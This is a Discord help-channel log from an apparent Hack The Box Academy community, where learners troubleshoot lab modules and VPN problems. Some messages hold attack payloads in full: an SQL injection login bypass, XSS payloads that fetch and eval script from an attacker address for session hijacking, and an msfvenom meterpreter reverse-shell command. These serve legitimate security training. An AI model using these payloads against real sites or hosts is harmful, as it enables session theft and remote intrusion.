Executing query: SELECT * FROM logins WHERE username='tom' AND password = 'tom' or '1'='1';

Login successful as user: admin
What wrong ?

#

Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?

novel matrix
fathom pendant
valid gate
fathom pendant
#

you shouldn't have to log in, considering the fact that you can ask the chat bubble about log in issues

valid gate
#

I'm not sure which chat bubble you're referring to

#

on the site?

fathom pendant
#

yes

#

typically found at the bottom right there should be a little chat bubble thing (may need to disable adblock for it)

valid gate
wraith ruin
fathom pendant
valid gate
#

I did already this morning :/

#

ahhhh could be DNS

#

Okay yup I got it now after changing my DNS settings back to default. 👍

dull canyon
#

is htb server currently down cuz i can't start insatnce?

fathom pendant
#

everything looks fine to me

#

¯_(ツ)_/¯

#

try refreshing the page, changing vpn regions, logging out and back in

dull canyon
#

ok

hasty sparrow
#

yo

fathom pendant
#

this isn't #general please read and follow the instructions in #welcome to gain access to the rest of the server

sharp notch
#

Good morning

thick kite
#

hi, i want to subribe student course but my silver course is still available. How can I do to get student course immediately?

sharp notch
#

Idk I have the silver yearly plan

#

Gonna go for a drive get my mind right for a day of learning

compact patrolBOT
teal arrow
#

I need some help

#

SOCKS5 Tunneling with chisel, I transferred my file over to the compromised server but im getting this error:
~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)

How can I fix this?

cloud urchin
#

statically compile it or use an older version

violet prawn
#

Hi I'm working on the Pass the Ticket from Windows Section and am currently stuck on the second question:

Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john

I have tried to run the commands from the section both with mimikatz and Rubeus to get the ticket for john. However when looking at the output there is no john user to be found. Julio is there and some others but no john and doing the dir *.kirbi gives me the same.

Anyone have any idea on how to continue further or a hint to push me in the right direction?

gray yacht
violet prawn
#

will try that thank you

gray yacht
quartz ridge
#

hello

cloud urchin
# quartz ridge hello

Hi, welcome. This channel is dedicated for discussion of the modules on Academy. Please read the #rules and follow the instructions in #welcome to gain access to more appropriate channels for general greetings.

slate sleet
#

Hey all. I'm struggling with the File Inclusion Skills Challenge. I can poison the log but whenever I try to get RCE the log seems to die and I have to restart the server. I never get any command output in the log. Any thoughts?

#

Tried with Burp and just with curl

fathom pendant
slate sleet
fathom pendant
#

one will brick the log and you'd need to reset the lab to get it to work properly again

slate sleet
hasty sparrow
#

yo

gray yacht
# hasty sparrow yo

Hi, welcome. This channel is dedicated for discussion of the modules on Academy. Please read the #rules and follow the instructions in #welcome to gain access to more appropriate channels for general greetings.

deep hemlock
#

hello
in pass the hash from password attack module stuck for about a long with the davids hash to read the file david.txt

violet prawn
slate sleet
slate sleet
opal shuttle
#

Then you will get new cmd

#

As david, then you will be able to access that one

real tapir
#

Module Name: Linux Privilege Escalation
Section Name: Environment Enumeration
https://academy.hackthebox.com/module/51/section/1592
Question you're struggling with:
I'm unable to ssh into the target server. The error I get is ssh: connect to host 10.129.xxx.xxx port 22: Connection timed out.
Generally what you've tried (while avoiding spoilers, i.e. logged in as j and couldn't find anything)*
I connected to the vpn and ran ssh htb-student@10.129.xxx.xxx.

rustic sage
#

support hasnt responded to me

#

it's been a day I need to buy the exam, it wont let me

real tapir
#

I've found that asking for help in the wrong channel gets more attention troll
Still I try my best to remember the correct channel to use because it's kinder.

lime shoal
#

Module Name: Getting Started
Section Name: Service Scanning
https://academy.hackthebox.com/module/77/section/726
Question you're struggling with:
when I conduct an nmap scan I get a "Note: Host seems down" although I'm attempting to scan the ip address specified in the module: 10.129.42.253
Generally what you've tried I've tried using the more detailed nmap scan

real tapir
last bronze
#

Guys Any way to remove Credit Card from the Academy HTB.

lime shoal
last bronze
cloud urchin
last bronze
#

Ok

real tapir
lime shoal
real tapir
#

Looks like you have the same issue as me then.

#

Or, similar.

lime shoal
muted blade
#

hey, anyone having issues with the vm for "AD Enumeration & Attacks - Skills Assessment Part I"? it's incredibly slow, i can't get a shell for more than 20 seconds, the entire thing hangs
already tried resetting

dawn snow
#

Hi guys, could use some help with findings from the Reporting module.

#
  1. One vulnerability found in 2 different places (like an xss in 2 different subdomains) should be presented as one or two findings?
  2. Exploiting 2 different AD permissions (like GenericWrite, ExtendedRight, AddSelf,...) for different purposes should be presented as N different findings or just one broader Active Directory ACL Abuse? Same with kerberoasting and cross-forest kerberoasting.
  3. What if I use a certain finding, to exploit another one? Should I leave this for the attack-chain or should I mention it in the detailed walkthrough of the finding?
teal arrow
#

Module:
ICMP tunneling with ptunnel-ng
Error:
$ sudo ./ptunnel-ng -r10.129.202.64 -R22
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

I need some guidance here, do I just need to use an older version?

valid gate
cloud urchin
dawn snow
gray yacht
lime shoal
# real tapir .

just out of interest, when I did an nmap scan of my own ip it worked, so perhaps it is the 10.129.42.253 host that is down?

real tapir
#

That's what I think too.

#

I tried pinging the ip I was provided and didn't get a response.

proven plinth
proven plinth
#

10.10.14.1 is already on the other side of the tunnel. There could be some issue with their internal network

#

I suggest switching VPN servers. Just download a different OVPN file and see if it works

rustic sage
#

How long is the CJCA exam?

lime shoal
lime shoal
cloud urchin
proven plinth
#

If that happens use "ps aux | grep openvpn", find the program id and kill the duplicates

lime shoal
#

@proven plinth @cloud urchin really appreciate the advice - thank you! 🙏

real tapir
#

When I ran traceroute it just gives a bunch of asterisks.

cloud urchin
#

sounds like you're not connected

real tapir
#
Using configuration profile from file: /tmp/.../academy-regular.ovpn
Session path: /net/openvpn/v3/sessions/...
Connected```
#

Oh I disabled compression, could that be it?

cloud urchin
#

doubt it, but who knows. i just use openvpn <vpn file> & when i launch it

#

make sure you don't have multiple vpn connections and are also not using the pwnbox at the same time. if all that is fine, try re-downloading a TCP VPN file from a different server or region and try agian.

real tapir
#

Oh I was using UDP.

#

I have only one vpn connection, not using the pwnbox. I'm using a TCP config file for US EAST that has compression disabled, and it doesn't work.

cloud urchin
#

k then try what i said

fathom pendant
#

That's a pwnbox location

real tapir
#

oh

#

Oh nvm I'm using EU Academy 5.

real tapir
fathom pendant
#

¯_(ツ)_/¯

#

It's the same thing really

#

Your binary is just labeled as openvpn3

real tapir
#

It doesn't accept putting the file immediately after openvpn3.

fathom pendant
#

If your ovpn file is in downloads, ./Downloads/filename.ovpn

#

Or ~/Downloads/filename.ovpn

fathom pendant
real tapir
#

openvpn3: Unknown command '/tmp/.../academy-regular.ovpn'

real tapir
flint palm
#

guys hello has anyone completed wpa 2 attacks module if someone did I need some help

fathom pendant
#

Oh so yours is a whole different syntax altogether

fathom pendant
real tapir
#

I don't save it. I typically re-download it every time.

fathom pendant
#

You dont have to, is why my point is lol

real tapir
#

If I don't redownload, I save it in an easier location on my main computer and just drag it over when I need to use it.

proven plinth
fathom pendant
#

Eh

proven plinth
#

That way you're also saving yourself from needing to redownload it every time

fathom pendant
#

Whatever workflow works

proven plinth
flint palm
#

guys hello has anyone completed wpa 2 attacks module if someone did I need some help

#

You are in a wrong place bro we are sorry

sweet bay
#

No problem man

#

Sorry e

#

Everyone

real tapir
#

So I delete it occasionally, like today.

real tapir
#

Anyways I still can't ssh.

#

And traceroute still has asterisks.

cloud urchin
median burrow
#

hello

real tapir
median burrow
#

can someone help me? im stuck with the machine called "era", is my first medium, i got the admin user and the 3 answers to the quesions, but the web tell me that im wrong and i dont think it is, any help frop private? please im stuck for 1h

fathom pendant
median burrow
#

okay sorry

hexed oyster
#

working on 'Web services and API attacks', section: "api attacks", Struggling with question 8 (final assessment). using a simple curl script to send the request, I keep getting errors indicating that I've not yet correctly formed a valid soap request. any advice would be very welcomed. I'm attempting to simply get a valid login response to continue testing that but I'm unsure as to what I've got wrong.

stray wadi
#

Hi, Can i get some advice on the pivoting, tunneling and port forwarding module? I am trying to answer "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)" but I am having trouble with creating a Meterpreter shell. I constructed the payload by using: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080. The LHOST I set to 172.16.x.x & I copied the payload to the pivot server via using scp. I ran msfconsole & ran the ./backupjob but my msfconsole exploit does not connect to the pivot server. Am I doing this wrong? I have been trying to use different ip addresses & ports from the pivot host but I am still having the same error.

hexed oyster
#

violently suppresses urge to insert 'pivot' gifs

gray yacht
cloud urchin
#

got him thanks r1cky

stray wadi
gray yacht
hexed oyster
silk lagoon
hexed oyster
pine hearth
#

bro how do I find the password for admin
bruteforcing takes a hell lot of time

fathom pendant
#

have you done the tried and true: admin:admin?

silk lagoon
hexed oyster
silk lagoon
#

Is this not correct?

“Assess the target, identify an SQL Injection vulnerability through SOAP messages and answer the question below”

pine hearth
#

im bruteforcing via rockyou.txt lets see

hexed oyster
#

all I'm getting back is "enter a valid param for HackTheB0X API"

silk lagoon
#

Did you analyze the wsdl?

#

Figure out what to modify and what payload you can use.

#

To get a valid “login”

#

The question itself pretty much gives it away tbh

hexed oyster
silk lagoon
#

ill pm you

hexed oyster
#

k

teal arrow
#

does buying the annual membership provide module walkthroughs for all paths??

fathom pendant
#

yes

#

but i would advise against using the walkthrough until you've exhausted all other options tbh

teal arrow
fathom pendant
#

There's a good reason that some concepts come back, and are explained more in-depth, at a later module.
Let's take the Footprinting and the Attacking Common Services modules as examples of this:
The goal of footprinting is to gain basic information without necessarily attacking the surface, more of a surface level skimming the water, so the goal isn't to attack rather to gain info. I.e. judging the water's depth.
The goal then of Attacking Common Services is to actively go after those services in other ways that gain you even more access.
This explains, in-part, why the FTP and SMB sections really only have you focus on the bare minimum -- anonymous/null sessions to gather info in footprinting

#

you don't need to go in-depth if you're just looking at the surface for something easy to latch onto

teal arrow
# fathom pendant you don't need to go in-depth if you're just looking at the surface for somethin...

That's not what I mean, theres a difference between lightly touching over a subject vs not mentioning it in the module at all.
For example, I believe it's either attacking passwords or attacking common services where I had to use SQL injections to compromise servers. To you it may seem like common knowledge but the module didn't touch on that at all, it wasn't until later on in the path that I learned about it.

fathom pendant
#

i don't recall SQLi being part of Password Attacks or Common Services but i'm going back over modules so i'll try and keep it in mind. Not doubting what you said, just not in my memory vault

teal arrow
#

Yes lol, I remember because I spent the whole day on that one box. Not exaggerating either. It was very frustrating, let me see if I still have the notes.

merry crag
#

Where is SQLi in password attacks? I just finished that module and I dont think I had to

teal arrow
#

Attacking Common Services - Skills assessment Hard
SQL Injection/Impersonation of privileges, I think the box said there was two ways to do it, but either way should be at least touched upon in the module.

fathom pendant
#

yeah there's a far different method than SQLi; i don't even remember tbh but it was all methods taught in the module

cloud urchin
#

Everything is taught in the module.

gray yacht
urban tendon
#

Hello, im trying to go through the Session Hijacking part of this module and attempting to input
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement('script');a.src='http://our_ip/';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://our_ip"/)</script>
these scripts with my IP:80 in place of OUT_IP, I have a PHP server listening on my IP:80 and have sent curl get request to make sure it does recieve requests on this ip and port, but none of these scripts work when inputing them in the Fullname, Username, and Profile Image Url boxing and hitting register, I don't get any GET requests sent to my php server whatsoever and am trying to truble shoot the problem and would appreciate ideas.

Thank you for yalls time

deep hemlock
#

hello

#

anyone available to help

cloud urchin
#

don't ask just ask

deep hemlock
#

In pass the certificate attack on academy htb to solve the question what should i do
i tried how they showed but not working

#

@cloud urchin what attack should i try suggest some name or other things

cloud urchin
#

i haven't done the updated module

sinful bear
#

Hii

urban tendon
fathom pendant
fathom pendant
urban tendon
#

i apologize it wasnt obvious to me 🙂

fathom pendant
#

sorry i wasn't available at the time to help walk you through the process of figuring it out

sinful bear
#

So, is this server for learning how to hack?

urban tendon
#

hey no problem im just glad that i was able to figure it out, now itll stick with me 😄

fathom pendant
waxen totem
fathom pendant
#

in short; legal hacking is the name of the game, not ddos or anything that would negatively impact a business

urban tendon
waxen totem
waxen totem
sinful bear
#

So say my account got compromised (not asking for assistance here) but if I hacked my way into my account after it got compromised, it would be legal since it's technically still mine?

fathom pendant
#

the account isn't yours, a company just gives you the namespace

waxen totem
#

you don't own any of your accounts they are loaned to you by the company you created the account with. For more information read the terms of service.

fathom pendant
#

^

sinful bear
#

Ahhh ok

fathom pendant
#

it's why companies are allowed to just ban you/revoke your access to said account

#

the most advice you'll get here regarding account recovery is reaching out to the company in question's support team

sinful bear
#

I thought it was mine because I created it 😅

fathom pendant
#

nope

#

in the ever expanding digital landscape it's not an ownership, it's a loan agreement

sinful bear
#

So the admins of discord is essentially the landlords of our accounts whilst we're just the tenants?

fathom pendant
#

you "creating" your account is just requesting the username/namespace from the company, and them granting it to you (so long as you abide by their terms of service)

sinful bear
#

Right- makes sense

fathom pendant
#

it's why, as a public discord especially, we have to abide by the Discord Terms of Service alongside the HTB Terms of Service

deep hemlock
#

In pass the certificate attack on academy htb to solve the question what should i do
i tried how they showed but not working

man someone please give me any idea

sinful bear
#

Because I've been wanting to learn how to hack, because that way I can learn how to stop my account from getting hacked cuz I'll know all the tricks, then I'll know how to protect my account against them

fathom pendant
fathom pendant
#

just make sure you have ntlmrelayx running, and running the one thing (i think pywhisker) in a venv as described

sinful bear
fathom pendant
#

basic internet safety ¯_(ツ)_/¯

#

since 199x

sinful bear
#

Pretty much ig 🤔

#

There were hackers on animal crossing who could spawn amiibo items. Now I think about it.. that was also illegal right?

fathom pendant
#

ah it was pkinittools

#

that's the one that required the venv

fathom pendant
#

all it was was rfid spoofing, to put it short

#

but that's diving way off topic for this channel

#

if you wanna learn hacking and get a genuine interest in it, it doesn't hurt to at least sign up for hackthebox and check out the tier 0 modules (they're free)

deep hemlock
fathom pendant
#

i just followed as it showed; i'm assuming you're on q1 still?

deep hemlock
#

yes

fathom pendant
#

in order to figure out what you're having issues with i just need to know if you're on the first or second question

deep hemlock
#

yeah on the first question

fathom pendant
#

also "none work" isn't really helpful for diagnosing issues

#

do you get some form of error (that isn't resolved by the notes on this section)

deep hemlock
#

getting error running the tool you just mentioned i dont have that file

fathom pendant
#

but yes you start with printerbug

#

i've seen some people get some weird thing with their tooling that gives them the base64 certificate instead of saving it to a file

#

ntlmrelayx -> printerbug -> rest should follow from here

#

it's easy to maybe miss over the module running the initial ntlmrelayx command

deep hemlock
fathom pendant
#

make sure you pay attention to which server connection goes where (DC01 vs CA01)

#

CA01 being the cert server

deep hemlock
#

OK

fathom pendant
#

printerbug should be calling the DC01, not the CA01 server

#

idk i just remember double checking what server (whenever it was noted) in the reading

deep hemlock
#

please check 🥲

fathom pendant
#

i'm heading to bed ¯_(ツ)_/¯

deep hemlock
#

anyone

opal shuttle
#

Name

deep hemlock
#

password attacks
Pass the certificate

opal shuttle
#

That one is pending

#

I have done till windows pth

#

After that there were some pivoting concepts

#

So i left that module and started pivoting module

#

I will get back there

#

Once i completed pivoting one

deep hemlock
#

i have little idea about pivoting so i have to pivot here right?

deep hemlock
#

hm

#

anyone help

deep hemlock
#

solved thanks

vague cedar
#

In SocksOverRdp section of pivoting tunneling and port forwarding module. Im getting this error while trying to load the dll files as taught in the section
"The module "SocksOverRdp.dll" failed to load make sure the binary stored at the specified path of the it to check for problems with the binary or dependent.dll files."
The defender is OFF as well

Operation did not complete successfully because the file contains a virus or potential in wanted software

acoustic owl
#

Deactivate the Real-time protection in Windows Security

vague cedar
#

checked it, it was already off

inner sand
drowsy raptor
#

It could be flagging it based on static fingerprinting

deep hemlock
#

Is there anyone who solved the Skills Assessment - Password Attacks

timber gull
#

Guys, smbd knows when machines become online?

dry falcon
#

how to do this ?

flint palm
#

Guys why hostapd file throws mistake all the time?

#

I did it as was shown in their module but it throws mistakes all the time

acoustic owl
# flint palm Guys why hostapd file throws mistake all the time?

With the Wi-Fi modules I have completed so far, everything shown only works in the machine provided specifically for this purpose. Here, interfaces etc. are configured accordingly and are also compatible. Not every interface supports every operating mode. So if you want to try it outside of the machine provided for this purpose, you must ensure that the hardware is compatible.

vague cedar
flint palm
acoustic owl
jade lotus
#

Is it normal for Kibana to take minutes to load each page?

acoustic owl
devout lily
#

Can someone tell me what i have to do with this exercise on the getting started module?

trail adder
#

hello community

#

am new here

#

what do u recomed for a newbie, thm or htb

#

would like to be a pentester

#

hello people

#

no one here

#

isnt this 300k server

dull solar
#

Put the target into your browser.

#

/robots.txt

opal shuttle
#

learn some networking fundaments

opal shuttle
#

see what they taught

#

and apply there

devout lily
#

Just for knowledge

dull solar
devout lily
#

Thx

faint hamlet
drowsy vector
#

I am currently attempting AEN doing the web Enum and exploit

I am doing support.inlanefreight.local and I already got the admin cookie. But editing the value doesn't give me access. I tried using burp to see what was going on but it just shows that it redirects me to dashboard and then back to login.

opal shuttle
#

go to general off topic chat bro

carmine girder
acoustic owl
opal shuttle
eager barn
#

Hello can anyone help me? I am stuck on the Password Attacks Assessment. I was able to pivot to the internal host using ligolo and then ran nmap on the internal network but can't do anything beyond that 🙁

feral prawn
#

Yo dudes and dudlets, you gotta knowledge to share ??

#

I want just a lil guide I am doing all the stuff and learning but it's really vast thing so kinda confused I am

#

And also Whytf I can't message in #general

rare mirage
#

What type of network cable is used to transmit data over long distances with minimal signal loss? Can anyone help me? I've been stuck on this "stupid" question for 30 minutes in the Network Foundations module and I've tried answering everything, fiber optics, coaxial, ethernet, digital, analog but nothing works.

solid mirage
#

Fiber optic cable i guess

#

since the question is just asking what type of cable
put just Fiber-optic no need to put cable at the end.

rare mirage
#

When I put the hyphen it was lol thank you so much for the help, I can't believe I got stuck on this because of a hyphen, but thank you so much again

stone socket
#

Hi, I am stuck on the Windows Privilege Escalation module in the Windows Server submodule. I cant seem to find the right exploit to privesc even though I almost tried all of them. Is anyone available to discuss this topic ?

sick nebula
#

anyone at the sql injection who wants to go through it together?

wild oriole
#

Hey guys,
In the "Logrotate" module, I'm using a reverse shell immediately droped off after getting it

storm elk
#

Gotta be fast

wild oriole
storm elk
#

No

#

Gotta be fast aka have the command ready to paste and enter

feral prawn
real tapir
# cloud urchin Are you using the pwnbox too?

I'm trying again today. Here's the output of ip a:

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:a2:6b:46 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute enp0s3
       valid_lft 85298sec preferred_lft 85298sec
    inet6 fe80::ff7b:af95:cea2:28b6/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.15.174/23 brd 10.10.15.255 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::11ac/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::d1c8:a625:ee24:36bf/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

The output of nmap 10.10.15.174/23:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-02 13:58 EDT
Nmap scan report for 10.10.15.174
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
53/tcp open  domain

Nmap done: 512 IP addresses (1 host up) scanned in 53.05 seconds

Ssh doesn't work, and traceroute to target provides asterisks. I redownloaded the ovpn file again, commented out the comp-lzo line, and used openvpn3 session-start --config to connect. It seems I cannot access the network even though I am connected to the vpn.

delicate adder
#

I'm doing the module on default passwords but it tells me to access ssh to find the mysql credentials but I can't understand how I should find the sql credentials inside an ssh machine if it can be useful this is the link to the module https://academy.hackthebox.com/module/147/section/1328

fathom pendant
delicate adder
fathom pendant
delicate adder
#

I tried to log in with the default mysql credentials but it doesn't work. I'm wondering if I should use some wordlist but I'm on an ssh machine.

rich obsidian
#

I have gotten all the answers for the DNS section in the enumeration module of the pentest path, but I still don't understand how I was supposed to explicitly identify the secondary dns server. I did, but it doesn't feel replicable because every query i tried was status: refused and I just operationally tried a zone transfer and got answers. This doesn't feel replicable in a real environment where I would be enumerating. Was this how I was supposed to stumble onto it or was there another way where I would have received information that would have allowed me to concluded that it was serving DNS as well? (tried nmap too, all of the packets were being dropped even if i specified port 53 as the source port)

fathom pendant
spark needle
#

All, I have spent hours on the Third Parties module of OSINT: Corporate Recon. Has anyone completed this? Can anyone help point me in the right direction? Much appreciated

rich obsidian
fathom pendant
errant moss
#

Lab machine connection unstable!
Hello! I just started working on the "Active Directory Enumeration & Attacks" module

https://academy.hackthebox.com/module/143

It's great that it's sets up like a real penetration test! However I'm having trouble maintaining connection to the provided lab machine ATTACK01 and it's slowing me down. Regardless if I'm using SSH or RDP, doing it from my own Kali VM via the VPN or PwnBox, the result is the same, every couple of minutes the connection is lost and it's hard to get it back.

It's really slowing down the work and it's been this way for at least a couple of days. Anyone else had this issue? Status page, https://status.hackthebox.com/, indicates everything should be fine.

sharp notch
#

those are usually accessible

cloud urchin
errant moss
#

Great! I'll do that. In a nutshell, why's TCP better than UDP?

fathom pendant
sharp notch
#

almost done with cracking into htb now just javascrupt obnomistration

errant moss
sharp notch
#

deobfuscation* oops

fathom pendant
sharp notch
#

facts

#

i found myself like overcomplicating things in the privilege scalation

#

i hope i didnt do it baCKWARDS lmao

fathom pendant
#

By work ahead I mean: it's easy to start to deobfuscate/cleanup and you end up with the flag for the next section

sharp notch
#

numerous extra scanning and enumarting which is good practice but missed some small things that were in my face

#

ohh

#

whattt

fathom pendant
#

What youre talking about is just doing extra work

sharp notch
#

yuh exactly lol

#

thats intersting u said i could get flag for next one i gotta be careful then

fathom pendant
#

Working ahead is; module is at step 1, and you managed to get to step 5

#

Then wonder why the flag doesn't work

sharp notch
#

go along as it comes

#

i got nice note section on my laptop which is good the ones on the site stay with the module

#

after this is when i can choose my next path correct?

#

i also terminate each machine after the lesson idk if that has to do with what youre saying

real tapir
rich obsidian
rich obsidian
fathom pendant
#

Any is generally a deprecated query; however i wouldn't say all the wordlists. Best practice is start small then go bigger

rich obsidian
fathom pendant
#

Well theres the dnsenum tool that exists to make life a bit easier

rich obsidian
fathom pendant
#

Imo I wouldn't try and get bogged down in finding every little thing

#

Once you find new info: act on it

opal shuttle
rich obsidian
rich obsidian
#

then at least it would be down to like 3 commands per subdomain

opal shuttle
#

which module you are doing?

rich obsidian
#

i still may make a program so it can be one command instead of 3 lol

#

Enumeration DNS

opal shuttle
#

ohkk

rich obsidian
opal shuttle
#

dont increase the number of threads too much

fathom pendant
#

Thats why its barely touched on

silver ocean
#

Hello everyone I'm on this module https://academy.hackthebox.com/module/143/section/1484

Trying Petitpotam, I am getting clock skew issue on the command python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache any guidance?

fathom pendant
silver ocean
#

The issue:

``

#
2025-08-01 16:25:57,977 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-08-01 16:25:58,089 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError:  Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"

silver ocean
fathom pendant
rich obsidian